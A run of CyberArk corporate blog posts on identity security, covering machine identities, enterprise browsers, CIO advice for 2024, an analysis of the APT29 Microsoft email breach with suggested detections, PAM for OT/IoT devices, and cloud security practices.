As your organization builds its Zero Trust roadmap, ensure machine identities and secrets management are specifically called out in your identity governance policy and procedures. Machine identities and secrets management are essential components of a Zero Trust security strategy because they provide a means of authentication and secure communication between machines on a network. By including machine identities and secrets management in your Zero Trust strategy, organizations can ensure that only trusted machines can communicate on the network and that unauthorized access attempts are detected and prevented.

Machine identity management policies should be established to govern machine identity generation, renewal and revocation. Regular audits and monitoring should also be conducted to identify abnormal or unauthorized activity.

It’s crucial to aim for at least four goals as you build out your machine identity practices:

  1. Greater visibility. Currently, 62% of security teams operate with limited visibility across their environment, making the task of securing human and especially machine identities cumbersome and inefficient. A comprehensive secrets management and machine identity management policy can give organizations greater visibility into their network, allowing them to closely monitor and track managed and unmanaged secrets and machine activity. By enhancing visibility, you can ensure the provisioning of certificates across all areas of IT infrastructure, including hybrid and multi-cloud environments.
  2. Improved security. Centralized management of secrets and machine identities is a key element of a comprehensive Zero Trust strategy. Functions like centralized rotation of secrets help eliminate the problem of hard-coded secrets and enable organizations to audit which applications and machines are using each secret.
  3. Lower risk digital transformation enablement. The dynamism of hybrid and multi-cloud environments and DevOps practices demands agile central management for secrets and machine identities. Integrating identity security automatically in CI/CD pipelines, for instance, ensures that identity integrity is baked into your development processes and not just an afterthought.
  4. Improved operations efficiency. Automation tools improve efficiency. Additionally, native integrations with DevOps tools and the cloud provider’s built-in (native) services increase developers’ adoption of secure coding practices, ultimately increasing overall productivity and accelerating the deployment of new services more rapidly.

Ultimately, incorporating machine identities and secrets management into a Zero Trust strategy can help your organization establish a more robust and secure network architecture and reduce costs associated with traditional security approaches while reducing the time to deploy new services. A comprehensive machine identity management policy can help organizations secure their networks and protect against cyber threats. By proactively managing machine identities and secrets, organizations can ensure that only trusted machines can communicate on the network and that any unauthorized access attempts are quickly detected and prevented.

As organizations continue to adopt Zero Trust, they must pay attention to the pivotal role that machine identities play in digital environments. And that’s why the overall security strategy must account for them. Investing in tools and processes to manage these identities effectively will pay dividends by reducing risk and ultimately fortifying the organization’s security posture in the face of an ever-changing threat landscape.

Machine Identities and Secrets: Organizational Binding Strands

My call to action for any organization is straightforward: Embed the management of machine identities and secrets into your Zero Trust strategy. Rigorously verify identities, systematically manage machine identities and secrets – and use threat analytics to understand when and where they’re being abused. Remember, in the fabric of cyber defense, a layered defense is critical and letting even one thread unravel can lead to a garment’s undoing. That’s why machine identities and secrets are not just threads; they are vital strands that hold together the security tapestry of our digital enterprises.

James Imanian is the senior director of the U.S. Federal Technology Office at CyberArk.

]]>
Enterprise Browser: The Gateway to Securing All Identities https://www.cyberark.com/blog/enterprise-browser-the-gateway-to-securing-all-identities/ Wed, 21 Feb 2024 14:37:16 +0000 https://www.cyberark.com/?p=187460 Skyscrapers by night with bokeh lights trail

With new identities, environments and attack methods dominating today’s threat landscape, cybersecurity leaders are hyper-focused on securing identities to safeguard enterprises. However, a glaring, high-touch security gap exists that threat actors actively exploit to steal confidential data. And unsuspecting as it seems, that gap lies in the most used enterprise application of all time – the web browser.

In today’s cloud-first world, browsers are the gateway to a company’s most critical assets and house sensitive information, such as user credentials and cookie data, making them prime targets for attackers. Yet, in a decidedly ironic reality, browser security rarely ranks on the priority list of security teams, making enterprises susceptible to attacks.

This seemingly nonsensical practice – or lack of practice – is primarily because organizations continue to use consumer-focused browsers for enterprise needs. Built for convenience over protection, these browsers enable access without securing it and lack the control and visibility security teams need to mitigate potential security incidents. This exposes organizations to various browser-based vulnerabilities – pre- and post-authentication, such as cookie hijacking, malware attacks on unmanaged endpoints and unauthorized user access leading to data exfiltration.

In an increasingly complex IT world, browsers that are disconnected from a broad end-to-end identity security infrastructure pose a massive threat to enterprises. For instance, workforce identities and their actions within browser environments often remain hidden from security teams, creating a gaping Achilles’ heel that enables attackers to steal confidential data without detection.

As such, security leaders need a solution that integrates a foundational identity security strategy into the browser environment and layers with existing infrastructure to balance enterprise security and workforce productivity effectively.

Securing Enterprise Web Browsing with an Identity-centric Approach

As organizations migrate to the cloud and the workforce grows, web browsers have become an intrinsic part of enterprise operations. From employees to third-party vendors – everyone uses a browser to access the confidential corporate resources required to do their jobs.

But with access comes risk, and mitigating it requires deep end user visibility and security control that traditional browsers aren’t designed to provide. Adding additional risk, employees often use the same work browser to access their personal data in cloud consoles. This can invite more opportunities for breaches, insider exfiltration and malware attacks.

Even for organizations with an identity and access management (IAM) strategy and dedicated privileged access management (PAM) solutions in place, browser-based vulnerabilities can easily expose them to potential threats and breaches.

The following are some common browser capabilities that, in an enterprise environment, can pose serious security threats:

  • Allowing users to install unverified extensions that can secretly upload data to attacker-controlled servers.
  • Providing enterprise workers with built-in tools to circumvent preventative controls put in place by the organization.
  • Enabling users to store passwords for all their applications – work-related and personal – in built-in password managers that are prone to breaches.

Attackers can harness the same basic functionalities designed for a convenient user browsing experience to carry out nefarious activities unless they are adequately protected. A prime example is cookie hijacking, where attackers steal, forge, alter or manipulate cookies from users’ web sessions to gain unauthorized access to sensitive resources. It’s a relatively simple post-authentication attack vector in which, in three steps, a threat actor:

  1. Acts as an imposter to hijack the cookies after a session has been authenticated.
  2. Replays the cookie in the session to bypass multi-factor authentication (MFA).
  3. Hijacks ongoing sessions to steal data, move laterally and escalate privileges to disrupt operations.

The bottom line is that enterprises need a comprehensive identity security strategy based on intelligent privilege controls that goes beyond endpoints into browsers to secure every workforce identity with access to the heart of your enterprise.

So, what does it take for browsers to integrate with your larger security infrastructure?

The simple answer would be extending the identity-based approach used for everything else into browsers. This would give IT teams the vantage point to ensure all workforce identities – employees, vendors and remote workers – adhere to risk-tolerant practices, guided by the principles of least privilege (PoLP) and just-in-time (JIT) access.

Navigating Today’s Threat Landscape with an Identity-focused Enterprise Browser

The actual value of an enterprise browser can be realized when combined with existing security infrastructure. For instance, enterprise browsers can prevent cookie hijacking by storing cookies on secure servers. This enables organizations to keep sensitive data beyond the reach of attackers so user web sessions, data and accounts remain protected.

Enterprise browsers should also come with built-in controls that can extend access to privileged targets using native integration to enable security teams to monitor end user activities within high-risk browser sessions, enforce policy-based browsing and prevent misuse of confidential corporate data.

By working together with other defense-in-depth solutions such as MFA, single sign-on (SSO) and session monitoring, enterprise browsers can:

  • Secure identities, endpoints, passwords and credentials from pre- and post-authentication attacks.
  • Enable users to access their resources and applications securely.
  • Unify identity security controls while ensuring privacy for every identity on every endpoint.

Breaking Browser Siloes to Balance Security and Productivity

While traditional browsers are largely siloed and not built to tackle the challenges posed by today’s identity-focused threat landscape, enterprise browsers alone can disrupt user experiences, given their restrictive controls.

For optimal web security and a seamless workforce experience, the enterprise browser and your current security solutions must work together to pave the way for an identity-based security posture that can prevent modern attacks.

Learn about CyberArk Secure Browser.

Sobhan Pramanik is a senior copywriter at CyberArk.

]]>
CIO POV: 3 Considerations as the 2024 Cyber Roller Coaster Gathers Speed https://www.cyberark.com/blog/cio-pov-3-considerations-as-the-2024-cyber-roller-coaster-gathers-speed/ Thu, 15 Feb 2024 14:44:46 +0000 https://www.cyberark.com/?p=187350 Top 3 with OG

If the first month-plus of 2024 is any indication, this year is likely to be anything but ordinary in the cybersecurity realm. In January alone, a triad of events unfolded, each more riveting than the last, setting the stage for a year that promises to be as unpredictable as it is exciting.

The following recent events have me reflecting on processes and controls that can help you better protect your organization’s most sensitive assets:

1. Nation-State Threat Actors Target High-Tech Companies

ATP29, the threat group behind the 2021 Solarwinds attack and linked to the Russian Foreign Intelligence Service (SVR), resurfaced in January when two tech giants – Microsoft and HPE – reported that the group lurked into their systems and accessed, monitored and exfiltrated data from various employee accounts, including those of executives.

Before these high-profile attacks, ATP29, also known as Cozy Bear, is believed to be responsible for the 2015-16 breach of unclassified networks at institutions such as the White House, the U.S. Department of State and the Democratic National Committee (DNC). Reports indicate that the same group successfully operated in Germany, South Korea and Ukraine.

A few days ago, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued multiple critical vulnerabilities and exposures (CVE) advisories that identify vulnerabilities in products or services from a reputed cybersecurity vendor used by many government agencies. CISA has warned that bad actors from China, part of the Volt Typhoon group, are exploiting these vulnerabilities and the potential risk to nation-states.

It’s certain now that the espionage and reconnaissance activities of nation-state threat actors are not limited to hacking critical infrastructure owned and operated by national government agencies. Instead, the increasing reliance of government agencies on an ever-growing technology ecosystem makes any supplier a potential victim. And the next victim could be you.

2. Unmitigated CVE 10 Invites Exploitation Attempts

On Jan. 16, 2024, Atlassian published an advisory on a critical vulnerability in its out-of-date versions of Confluence Data Center and Server that allows an unauthenticated attacker to achieve remote code execution. If successfully exploited, this vulnerability allows unauthenticated remote attackers to achieve remote code execution (RCE) on an affected instance. Days after publishing this advisory with a CVE score of 10, the Shadowserver Foundation observed nearly 40,000 exploitation attempts of this CVE. I assume these exploitation attempts were observed in instances that did not heed the warning to patch.

CVEs with a score of 10 indicate critical severity and require an immediate AppSec remediation plan. Security breaches often occur from known vulnerabilities left unmitigated, thus underscoring the importance of a mature change management process. The inability to patch or upgrade the software immediately despite an advisory often reflects complex or ill-defined change management processes. Additionally, interdependency can slow patching or upgrading with potential downstream impact on other processes.

3. Ransomware Continues to be Evergreen

The CyberArk 2023 Identity Security Threat Landscape Report finds that 89% of 2,300 global respondents have faced at least one ransomware attack. Ransomware is a big, if not the biggest, cybersecurity problem in the connected digital world and the first month of 2024 was no different. Tigo, a large telecommunications company in Paraguay; Kenya Airways, one of the largest airlines in Africa; AerCap, the largest aviation leasing company based out of Ireland; and Swedish government agencies are just a few examples of enterprises or government bodies that have suffered a ransomware attack in January 2024.

With the advent and adoption of GenAI, I expect ransomware attacks to increase substantially and potentially impact organizations of all sizes – even yours.

Buckle Up This Year – We’re Likely In For a Ride

Brace yourself for what I expect to be a roller coaster ride in 2024 for several reasons. This year, over 49% of the world’s population is expected to participate in national elections in over 64 countries. As a result of this, in addition to the regular threat landscape, we’ll see nation-state actors increasingly targeting rival government agencies, tech providers supporting the critical infrastructure and netizens to maximize their bounty – whether it be influence, espionage or purely monetary gains. In the wake of these impending attacks, I recommend that you bolster your organization’s defenses by considering the following:

Encrypt your email. Email accounts are often the lowest-hanging fruit that bad actors target regularly and incessantly. In today’s world, compromised emails are a gateway not just to financial bounty but to espionage for nation-state actors. In a world of cybersecurity and cyberwarfare, you must implement end-to-end email encryption (including attachments) to protect your organization’s data and, in turn, your customers.

Bring Your Own Key (BYOK). Your encryted data is secure only as long as the encryption keys are secured. BYOK lets you fully control the encryption key used to encypt your data. Since you are fully responsible for hosting, managing access, rotating, and revoking the encryption key, you maintain control over your data, particularly in complex multi-cloud environments.

Review and iterate change and risk management processes. Change management based on risk assessment offers a systematic method for modifying security procedures, technologies and operations that ensure every change is assessed, planned, communicated, monitored and, most importantly, reduces the risk of disruption and vulnerabilities. Ensure emergency cyber response (ECR) processes are in place to execute robust patch management cycles within 24 hours of a critical severity CVE advisory. This will help you contain the vulnerability swiftly and keep the genie in the bottle.

In this changing technological landscape, I recommend assessing the residual impact of change management to protect your organization’s sensitive assets. Sometimes, during the risk assessment process, you may discover that upgrading or patching might offer less than a 50% chance of improved protection, in which case you may choose to accept the risk and stay with the existing software version. In this case, robust compensating controls are your best savior.

Ensure compensating controls. This addresses any weaknesses of existing controls or compensates for the inability to meet specific security requirements due to various constraints. Virtual Private Network (VPN) and phishing-resistant multi-factor authentication (MFA) are implemented to bolster your defense in depth capabilities.

Consider the value of SaaS. Your AppSec teams might benefit from leveraging SaaS offerings, considering that patching and preventing vulnerabilities are daily tasks that consume a considerable amount of time. Be sure to evaluate not just your SaaS vendor’s processes to secure its environment but the focus and rigor it applies to the best practices on patching cadence based on a vulnerability’s severity. SaaS offerings provide proactive application and infrastructure support, including weekly or monthly patch management. They can effectively and efficiently implement patches or upgrade software in case of CVEs with scores of nine or 10 that require immediate attention. You’ll also potentially improve the availability of services by leveraging SaaS.

Bad Planning is Worse for Security Than Complexity

This first month of this year reminded us of the challenges we face in the digital age and our capacity to rise to these challenges. I encourage you to review your change management process and risk assessment cadence. Ensure you have the right compensating controls and consider if it’s time to adopt SaaS. Also, as you consider implementing these recommendations, the complexity of your environment or processes may seem like a roadblock to improved security. In my experience, it’s an ill-defined plan that is often the roadblock to security than the complexity itself. So, I’d suggest starting with your risk assessment plans, making them robust and agile enough to address your business goals and working backward to implement the above suggestions.

See you next month.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
APT29’s Attack on Microsoft: Tracking Cozy Bear’s Footprints https://www.cyberark.com/blog/apt29s-attack-on-microsoft-tracking-cozy-bears-footprints/ Thu, 08 Feb 2024 14:51:00 +0000 https://www.cyberark.com/?p=187193 APT29's Attack on Microsoft

A new and concerning chapter has unfolded in these troubled times of geopolitical chaos. The Cozy Bear threat actor has caused significant breaches targeting Microsoft and HPE, and more are likely to come. These recent events have sent shockwaves throughout the tech community, and for good reason. As we continue to uncover the fallout from these breaches, it has become apparent that the magnitude of the incident is more significant than we first realized. Today’s blog post sheds light on who exactly APT29 is, its motives, what tactics it continues to use – and ultimately, how organizations might prevent similar attacks from happening to them.

Who’s Behind the Microsoft Attack and Why?

The U.S. government has classified this threat actor as the advanced persistent threat APT29. The group also goes by many other names, such as CozyCar, The Dukes, CozyDuke, Midnight Blizzard (as Microsoft calls them), Dark Halo, NOBELIUM and UNC2452. Most people, however, know it by the moniker Cozy Bear. This group has rightfully earned a reputation as one of the world’s most advanced and elusive espionage groups.

In reviewing security camera footage, the Dutch government determined that the Russian Foreign Intelligence Service (or SVR) led this group. APT29’s primary objectives include acquiring political, economic and military intelligence to gain a competitive advantage, supporting geopolitical goals and enhancing Russia’s influence on the global stage. The group’s long-term and covert approach reflects its commitment to achieving sustained access to sensitive information, allowing it to conduct strategic operations over an extended period.

Industry experts generally agree that this threat actor formed in 2008 and has been targeting government entities, think tanks and critical infrastructure since 2010. Cozy Bear has since been linked to several high-profile cyber-attacks, including the 2016 breach of the Democratic National Committee (DNC), the SolarWinds supply chain attack of 2019 and the Republican National Committee (RNC) in 2021. This threat actor is known to be extremely patient and cautious. Cozy Bear sometimes dwells inside a network for years if the target is valuable enough.

Quick aside: An interesting thing to note is that the SolarWinds breach was the first time an attack method called Golden SAML was documented in the wild. The attack method was first discovered by CyberArk Labs’ Shaked Reiner in 2017.

What Happened to Microsoft (What We Know So Far)

On Jan. 12, Microsoft detected a threat actor who gained access to a small percentage of corporate email accounts, exfiltrated emails and attached documents of high-value targets, including those of senior leadership, cybersecurity and legal teams, along with other internal employee identities.

Based on the details provided by Microsoft at the time of this writing, it appears the initial objective of the attack was to acquire information. Once inside target email accounts, Cozy Bear searched for specific information about, well, Cozy Bear. The group likely wanted to better understand its adversary (the intelligence teams gathering information on it) and discover the countermeasures intended to lure and stop it. Examples of what the threat actor might be interested in include indicators of compromise (IoC), exposed cloud infrastructure used by the attacker, IP ranges and known tactics, techniques and procedures (TTPs).

Analyzing the Microsoft Breach

Based on the information provided by Microsoft on Jan. 19, it appears the threat actor gained access to a “legacy, non-production test tenant account” through a password spray attack.

Password spraying is a brute-force attack where the attacker slowly tries a list of passwords against accounts from various source IP addresses. This simple attack keeps the number of requests below the standard rate limit to stop rapid login attempts from single IP addresses. This technique helps its attacker avoid detection by not locking out user accounts due to multiple failed login attempts, a common identity threat detection and response (ITDR) capability offered in access management and privileged access management (PAM) solutions. This type of attack is significantly slower but much more difficult to detect. Subsequently, password spraying has a much higher chance of succeeding.

Using this technique, the attacker compromised and accessed the account. The question that comes to mind is, if this was publicly facing, why was multi-factor authentication (MFA) not part of the authentication flow?

In this situation, the permissions set was limited. However, the test account had access to an OAuth application that had elevated access into their corporate environment. Although this was deemed a “legacy” account, it still was authorized to access the production systems. This coverage gap is a familiar blind spot for many organizations; even with great technical controls to implement least privilege access, people and processes (such as ongoing entitlement reviews) remain essential elements of identity security programs.

At this point, the attacker created a series of malicious OAuth applications that enabled them to have multiple hooks into the target, providing higher persistence while making the defender’s job even harder. Afterward, the threat actor created a new user account to grant access to the Microsoft corporate environment for the other newly created and malicious OAuth applications. Then, the attacker used the initial compromised legacy test OAuth application to grant the newly created OAuth apps the Office 365 Exchange Online *full_access_as_app* role. This role typically grants extensive access and privileges to an application – which, in this case, allowed access to target mailboxes.

The granted privilege here is meaningful because it enabled the adversary to read and exfiltrate emails and attachments. This unauthorized connection was accomplished by generating valid access tokens to Microsoft’s Exchange server, even if the original user was not allowed to do so.

Surmised Microsoft Attack Flow

Microsoft Attack Flow

The graphic above charts APT29’s steps:

  1. Performed reconnaissance to identify potential victims (e.g., through LinkedIn, OSINT).
  2. Performed password spraying attack on the identified entities discovered in step 1.
  3. Accessed the compromised account (legacy test tenant).
  4. Escalated privileges by accessing an OAuth application with elevated privileges to the corporate environment.
  5. Created a few malicious OAuth applications.
  6. Created a new user account to grant consent in the Microsoft corporate environment for the malicious apps created in step 5.
  7. Granted the malicious apps Office 365 Exchange Online *full_access_as_app* role using the credentials gained from step 4.
  8. Read and exfiltrated emails belonging to Microsoft’s executive leadership team and security staff.

Prerequisite Misconfiguration Assumptions

Based on the information disclosed, we assume that certain misconfigurations were present:

  • Access to an OAuth application with elevated permissions to the internal environment.
  • Privileges allowing the creation of OAuth apps and users.
  • Privileges for reading emails.

It’s also worth mentioning that even though this attack created limited practical impact (stolen emails and file attachments), it can still escalate damage through various other paths, such as the exfiltration of regulated data or the disruption of systems.

What Your Organization Can Do to Help Prevent a Similar Attack

Protect Your Non-production Environments

One common mistake IT organizations make is that under-protected development environments are exposed to the internet, allowing access to threat actors. These environments should be segmented and not easily accessible from outside an organization’s perimeter. Organizations should extend cybersecurity controls in production environments into non-production environments – failure to follow best practices cause data breaches.

Another common mistake I see organizations make is using unsensitized data in test environments, allowing easy exfiltration. End user emails and attachments were not present in the legacy tenant. Still, Microsoft admitted it used the same credentials in its production environment and this legacy tenant. The threat actor’s ability to pivot and access production data resulted from reusing privileged credentials and the absence of segmenting nonproduction and production environments.

Because organizations cannot implicitly trust that best practices are adhered to by the people implementing the environments, we need to extend multiple controls, such as MFA, to environments outside of production. Everyone knows that MFA is important. That said, many organizations, including one of the largest tech giants in the world, didn’t use it correctly, at least in this case. Additionally, we must assume that systems are not always set up securely. Misconfigurations and accounts being over-provisioned are inevitable, which is why we preach taking a defense-in-depth approach to cybersecurity. Leveraging controls like least privilege and MFA to non-production environments is incredibly important.

Implement Identity Threat Detection and Response (ITDR)

The ATP29 attack on Microsoft is a textbook example of how ITDR is critical to an organization.

Starting with the initial access through password spray using a proxy, the lack of MFA followed – and the creation of privileged OAuth applications eventually led to generating a user account with a sensitive privilege … All these actions had the potential for detection and response.

Like every element of cybersecurity, ITDR capabilities are more effective when tightly integrated into an identity fabric that proactively reduces risk rather than waiting for an attack to be detected. CyberArk Labs is working on a project in the ITDR world, and we are pleased to share that our suggested ITDR list of rules covers most aspects of the attack.

Defenders should re-evaluate the effectiveness of their password spray detections against the “low volume” style of attack described above. The focus on OAuth emphasizes the importance of such detections and the need for a comprehensive ITDR solution covering both on-prem and Cloud aspects.

An additional line of defense includes having controls to prevent credentials reuse and to rotate all credentials consistently according to organizational policy. Finally, detecting the entry of risky commands could have further reduced the risk of this attack by limiting lateral and vertical movement.

Security teams should carefully review every impersonation action between non-human and human entities. Require administrative privileges for the OAuth application approval process (Consent).

Suggested ITDR Detections and Responses

The following recommendations correspond to password spraying attacks, OAuth abuse, and other malicious actions. You can monitor the following events to detect:

  • Login without MFA (and respond automatically, accordingly)
  • Reuse of authentication credentials and force rotation
  • Suspicious creation or reactivation of OAuth applications
  • The idle activity of an OAuth application
  • New admin privileges granted to a user and try to add correlation with deviation from an approved organizational process for changing and adding privileges (e.g., the need to open an IT support ticket or to authenticate with MFA again)
  • The activity of a user without a prior explicit user authentication (or session start event)
  • MFA-configured user behavior without a prior MFA check
  • Attempted actions that failed due to the post-expiration time of the credentials\tokens\cookie used
  • Entry of malicious commands
  • Attempts to bypass privileged access management solutions
  • User login using a proxy

The Time to Act is Now (and Always)

This recent attack on Microsoft is a stark reminder of the persistent and sophisticated threats from nation-state threat actors. And it isn’t likely the last we’ll see from Cozy Bear. Days after Microsoft’s breach announcement, other organizations have also announced they had fallen victim to this threat actor. CyberArk Labs expects that more attacks will continue to become public now that these indicators of compromise are available to everyone. It’s also essential to acknowledge that the threat landscape is not limited to a single actor or nation. Other states are actively developing and refining their cyber capabilities, ready to launch similar attacks with varying motives.

The attack is also a sobering glimpse into the future of cyber warfare. It serves as a call to action for heightened vigilance, collaboration and investment in cybersecurity. The looming specter of nation-state cyberattacks demands our attention, and the time to fortify ourselves is now. Ignoring these warnings would be to our peril. As a global community, we must work collectively to safeguard our digital infrastructure from the growing threat of nation-state cyber aggression.

Andy Thompson is CyberArk Labs’ Offensive Security Research Evangelist.

Editor’s note: For more insights from CyberArk Labs’ Andy Thompson on this subject and beyond, check out his appearance on CyberArk’s Trust Issues podcast episode, “Behind the Data Breach: Dissecting Cozy Bear’s Microsoft Attack.” The episode is available in the player below and on most major podcast platforms.

]]>
Redefining PAM to Secure OT and IoT Devices https://www.cyberark.com/blog/redefining-pam-to-secure-ot-and-iot-devices/ Tue, 06 Feb 2024 23:51:17 +0000 https://www.cyberark.com/?p=186994 Secure OT and IoT Devices

Left to their own devices, your organization’s devices can be a significant source of risk. Consider operational technology (OT), which is crucial for organizations but is not engineered and operated with a security-first mindset. Often, OT systems are beyond the purview of CISOs and are focused on meeting key objectives for system uptime and efficiency – leaving them vulnerable. Attackers seek to exploit human and non-human identities with high-risk access, including:

  • Devices used by third-party vendors that often remotely operate and service their client organizations’ OT systems.
  • Devices used by employees whose access to applications or endpoints leading to OT are protected by passwords that can be easily compromised through phishing or ransomware.
  • Devices embedded with machine identities with high-risk access to data and infrastructure, such as industrial control systems (ICS) and SCADA systems.

Outside of OT are Internet of Things (IoT) devices, including interconnected devices like smart thermostats or lightbulbs, wearable devices, and connected security cameras. What do these variables across OT, IoT and ICS have in common? The risks of interconnectivity.

One compromised identity can allow attackers to employ tactics such as installing malware that enables control over OT or IoT devices – often with devastating outcomes, including shutting down a manufacturer’s equipment, preventing compliance with regulations or taking IoT devices offline due to a widespread DDoS attack. These technologies are crucial for running business operations, making them appealing to attackers.

Understanding the Risks Embedded in OT and IoT Devices

Attackers have always sought to exploit privileged access, and now they’ve broadened their view of privilege. Securing this access remains critical, but now attackers know they can chart a similar attack path by exploiting human and non-human identities within OT environments and IoT devices. It is vitally important to know the status of all the devices on your network and take actionable steps to protect them from potential attacks.

According to the Microsoft Digital Defense Report 2023 (MDDR), 25% of OT devices use unsupported operating systems, making them more susceptible to cyberattacks. Traditionally, organizations separated OT from the internet by “air-gapping” these devices. However, increasing device interconnectedness, even in once-air-gapped environments, has posed new threats to business continuity. This change increases the need for comprehensive protection outside of foundational practices that once satisfied OT security.

In 2022, transportation, discrete manufacturing, and the food and beverage industries were the top three targeted sectors. The reason for the targeting? Interdependencies between IT and OT systems are the main factor. The consequences of cyber-attacks on OT systems are significant and only growing. 2023 saw an increasing number of more sophisticated attacks, with “More than 80% of the OT/ICS incidents started with an IT system compromise attributed to increased interconnectivity…”

Why It’s Essential to Redefine Your PAM Program for OT and IoT Threats

There are many challenges when we look at OT security, such as aging, fragile technology,  no longer supported operating systems and software – and a longer lifespan that suggests vulnerability. There is also an opportunity to improve and prepare before it’s too late. Organizations must redefine their PAM programs to secure a broader set of identities with high-risk access.

While OT and IoT are inherently different, these devices have common ground from a security perspective. Let’s look at three core areas of risk and how to reduce that risk when securing the broader ecosystem of unmanaged or loosely connected devices, including OT, IoT devices, and ICS.

1. Discovery of Devices and Firmware Updates

Privileged access management (PAM) programs should continuously discover and onboard new devices and accounts when added to your network(s), enhancing control and oversight. These accounts and the credentials used to run your organizational devices and assets must be securely managed and rotated, especially away from default passwords.

Isolating access to monitor and record sessions helps proactively report on and achieve continuous compliance. Managing privileged credentials on certain OT devices can be daunting due to the complexity and lacking visibility of the whole environment. Best-in-class PAM solutions allow you to control and rotate credentials on these devices securely, ensuring unauthorized access is mitigated. Leading PAM solutions can work with the gateway controlling these devices to ensure credentials are secured, rotated regularly and centrally managed to reduce the risk of credential theft.

It is crucial to safely provide credentials for device management solutions performing firmware updates and patches. Secrets management capabilities securely store and provide these credentials, ensuring the devices remain updated and maintain security protocols.

2. Gateway and Remote Access Vulnerability

Manage endpoint privileges to secure workstations (with desktop MFA, if possible) and stop the spread of ransomware and malware to OT. Endpoint security should also be implemented on IT-like systems that sit inside the OT boundary. For example, shared workstations that sit on factory floors. Sensitive equipment requires stringent security controls over workstations and servers that can reach OT devices by network.

Utilize an endpoint privilege manager (EPM) to harden the systems, maintain strict endpoint privilege security, and enforce least privilege, reducing the risk of unauthorized changes to critical systems. Ransomware remains the most significant threat to industrial infrastructure, and there’s been an observed shift towards ransomware attacks specifically targeting OT environments.

Many different identities can physically and remotely access IoT devices and OT environments. Ensuring a secure remote connection and advanced controls when these machines are being used is crucial. Remote access capabilities in PAM solutions provide secure access to credential vaults without VPNs, passwords or agents, plus the ability to provide offline access to credentials.

Secure, remote access is a vehicle to the vault or entry point to the OT environment. Apply controls to ensure vendors or contractors operating air-gapped environments can securely retrieve credentials offline. Rotate credentials based on organizational policy and sync them to users’ mobile devices after they leave and before they re-enter offline worksites.

3. Defense in Depth: Paperclip Resets, Unidirectional Gateways and Device Monitoring

Attackers will never stop innovating their methods to exploit credentials and data. They will also use old tricks like the Paperclip reset on devices, allowing them to reset devices to default passwords and then take over. Look for security-first solutions designed to detect this type of action and automatically remediate the threat by rotating the credentials for the device.

Actively observing, analyzing and managing the activities of connected devices and systems is paramount when securing your IoT devices and OT environments. Leading PAM solutions offer identity threat detection and response (ITDR) capabilities such as real-time monitoring, anomaly detection, security event and integrity monitoring, user behavior analytics and regulation compliance monitoring to ensure all interconnected devices are accessed properly by authorized personnel.

Securing and strengthening the flow of data in OT environments is essential. Unidirectional gateway, or a data diode, integrations with CyberArk’s OT and ICS partners allow you to monitor and detect any attempt to bypass PAM, preventing unauthorized access and high-risk account usage.

Don’t Forget Visibility for Audits and Compliance

Redefining your PAM program to satisfy OT and IoT use cases will satisfy industry-specific audits and compliance such as SOC, NIST and NERC CIP – and help you start implementing a Zero Trust architecture. Organizations involved in computer-integrated manufacturing (CIM) or rely heavily on ICS security and follow the Purdue Enterprise Reference Architecture (PERA/Purdue Model) or follow the IEC 62443 framework for the growing prevalence of Industrial Internet of Things (IIoT) technologies can fend off vulnerabilities and challenges in terms of cybersecurity threats.

Layering Identity Security for Operational Resilience

According to the Waterfall 2023 Threat Report, adding additional layers of security improves cyber and operational resilience in your manufacturing plants, automation systems, healthcare devices and smart cities. OT and ICS cybersecurity incidents in the last three years have already exceeded the total number reported between 1991 and 2000. Building a comprehensive cybersecurity program does not start and end with IT. Extending identity security concepts to go beyond the “walls” of IT to strengthen OT allows your organization to proactively thwart cyber threats that can impair business-critical operations, disrupt essential services and possibly threaten public health safety.

Ryne Laster is a product marketing manager at CyberArk.

Editor’s note: Attackers are constantly setting their sights on any aspect vulnerable to an organization. To explore how you can build a defense-in-depth approach to securing all human and non-human identities across OT systems, check out our webinar, “13 Ways to Improve OT Security.” And, for a dive into OT cybersecurity and its challenges and opportunities, listen to our Trust Issues podcast conversation with Mike Holcomb, the Fellow of Cybersecurity and the ICS/OT Cybersecurity Lead at Flour. You can check it out in the player below or wherever you get your podcasts.

 

]]>
Elevating Cloud Security With Well-Architected Practices https://www.cyberark.com/blog/elevating-cloud-security-with-well-architected-practices/ Wed, 31 Jan 2024 17:05:12 +0000 https://www.cyberark.com/?p=186951 cloud security architected

It’s said that life truly begins when you step out of your comfort zone. Living in California provides me with many options for hiking and trekking, a perfect backdrop for spending time with nature and enjoying it with friends and family. As a hiking and nature enthusiast, I have done many moderately challenging trails in and around the Bay Area – my comfort zone.

Last year, I decided I needed to get out of my comfort zone and do one of the most challenging hikes in the world, the trek to Everest Base Camp (EBC). Spanning 10 days and covering 80 miles through the scenic Himalayas, culminating at 18,000 feet – about half the cruising altitude of a commercial jet. Reaching the summit was incredibly uplifting and gave me a profound sense of accomplishment. However, the preparation and planning for the adventure provided long-standing benefits. Training for Everest propelled me into a disciplined physical routine and diet, adhering to best practices and guardrails since ensuring optimal fitness and enhancing my well-being.

Climbing the Cloud Transformation Mountain

There are parallels to my experience with the EBC hike in my career leading digital transformation and cloud initiatives for large enterprises and digital-native businesses. Organizations must constantly challenge their comfort zones, particularly when securing their application environments. As large enterprises complete their migration to the cloud and digital native businesses scale their offerings on the cloud, breaking away from their comfort zones by adhering to the well-architected frameworks published by their cloud providers, like AWS, Azure and GCP, becomes imperative. This urgency amplifies with the surge in cloud services and increased threats on cloud workloads due to the rise of artificial intelligence (AI). And this transformation should occur without slowing the pace of delivery.

All cloud providers abide by a shared responsibility model with organizations, making it their duty to adhere to the guardrails, ensuring the overall health of their cloud environments. Embracing solutions aligned with well-architected frameworks for security has been my strategic approach throughout this transformative time.

Key Guidelines for Securing Cloud Identities

When building secure and well-architected cloud environments, the following guidelines are essential for securing identities in the cloud:

1. The principle of least privilege (PoLP). Assign the minimum necessary permissions to users, processes and systems to perform their tasks, reducing the risk of unauthorized access. Implementing zero standing privileges (ZSP) and allocating just-in-time (JIT) access to roles scoped for least privilege ensures that only the required and essential permissions are granted to any user accessing cloud resources by console or command line interface (CLI) for the time allocated and enable non-human interactions through APIs (Application Programming Interface) securely.

2. Authentication and authorization. Implement strong authentication mechanisms, such as multi-factor authentication (MFA), and ensure proper authorization controls to manage access to cloud resources effectively. Platforms requiring MFA at login and supporting third-party IdPs to collaborate with existing SSO/MFA solutions can enforce the necessary authorization controls for cloud-native services.

